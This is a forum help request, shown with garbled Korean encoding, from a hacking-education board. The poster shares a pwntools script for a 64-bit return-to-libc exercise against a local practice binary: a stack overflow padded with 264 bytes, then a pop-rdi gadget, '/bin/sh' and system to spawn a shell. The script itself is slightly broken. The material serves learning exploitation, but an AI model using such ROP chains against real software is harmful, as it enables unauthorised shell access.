22019, 1/1101 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   qw3709
   64bit RTL Áú¹®..

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Board&no=36248 [º¹»ç]


¿¬½ÀÁßÀε¥ À߾ȵdz׿©.. µµ¿ÍÁÖ¼¼¿©


system : 0x7ffff7a60510
/bin/sh : 0x7ffff7b9b3f3
pop_rdi_ret : 0x555555554793

payload´Â

sfp(dummy 8byte)+ret(pop_rdi_ret 8byte)+/bin/sh+system
ÀÔ´Ï´Ù.


from pwn import *

p = process('./bof64')

base = 0x7ffff7a1e000
system = base+0x42510
binsh = base+0x17d3f3
poprdi = base-0x2aaaa24c986d

print "system : "+hex(system)
print "/bin/sh : "+hex(binsh)
print "pop_rdi_ret : "+hex(poprdi)

exploit = "A"*264
exploit += p64(poprdi)
exploit += p64(binsh)
exploit += p64(system)

p.send(exploit)
p.interactive


ÆÄÀ̽ã ÄÚµåÀÔ´Ï´Ù...
À߸𸣰ڽÀ´Ï´Ù µµ¿ÍÁÖ¼¼¿ä
  Hit : 9683     Date : 2018/06/19 03:54


    
     [°øÁö]ÇØÄ¿½ºÄð ÀÌ¿ë¼öÄ¢ 2021/04/11 ¼öÁ¤ÆÇ [54] ÇѽÂÀç 01/05 11554
22018   ÇØÄ¿9ÇÔ     k1230
 02/03 14
22017   A¤¿...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 01/27 57
22016   ¿À·£¸¸~     DarkSlayer
 12/11 252
22015   ÇØÄ¿½ºÄð ¿¾³¯ BGM[1]     wkfhddl4041
 11/07 407
22014   È÷À×...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/02 330
22013   ¹ÙµÏ°ú Àå±â     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/30 360
22012   ³ª´Â ¾ðÁ¦ ¾ÖÀÎÀÌ »ý±â³ª¿è...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 417
22011   Àü±¹ 1À§     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 369
22010   ´ã¹è ¤»¤»[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 372
22009   ¸ÅÆ®¸¯½ºÀÇ ÆĶõ¾àÀ» ¾Æ½Ê´Ï±î..?     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 355
22008   ¤·¤·[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/20 348
22007   ¿ÉÄ¡ ÇÙ°¨Áö ÇÁ·Î±×·¥Á» ¸¸µé¾îÁÖ¼¼¿ä[1]     powerima
 10/15 348
22006   ÇØÅ·ÆÀ¿ø ¸ðÁý[1]     koromoon
 08/27 867
22005   °°ÀÌ ÇØÅ· ÆÀ ÀÌ·ç½ÇºÐ??     hacs98
 08/26 558
22004   ¾Æ........ ¤Ð¤Ð     ÇØÅ·ÀßÇÏ°í½Í´Ù
 08/04 714
22003   ±Í¼ö(Сâ¢) µû¶óÇϱâ(?)     ÇØÅ·ÀßÇÏ°í½Í´Ù
 07/28 706
22002   ½º½º·Î ¸ñ¼ûÀ» Á®¹ö¸°´Ù´Â °ÍÀº     ÇØÅ·ÀßÇÏ°í½Í´Ù
 07/27 738
22001   ¹ÌÄ£µí     ÇØÅ·ÀßÇÏ°í½Í´Ù
 07/02 797
22000   »ç¹«½Ç     ÇØÅ·ÀßÇÏ°í½Í´Ù
 07/02 732
1 [2][3][4][5][6][7][8][9][10]..[1101]

Copyright 1999-2026 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org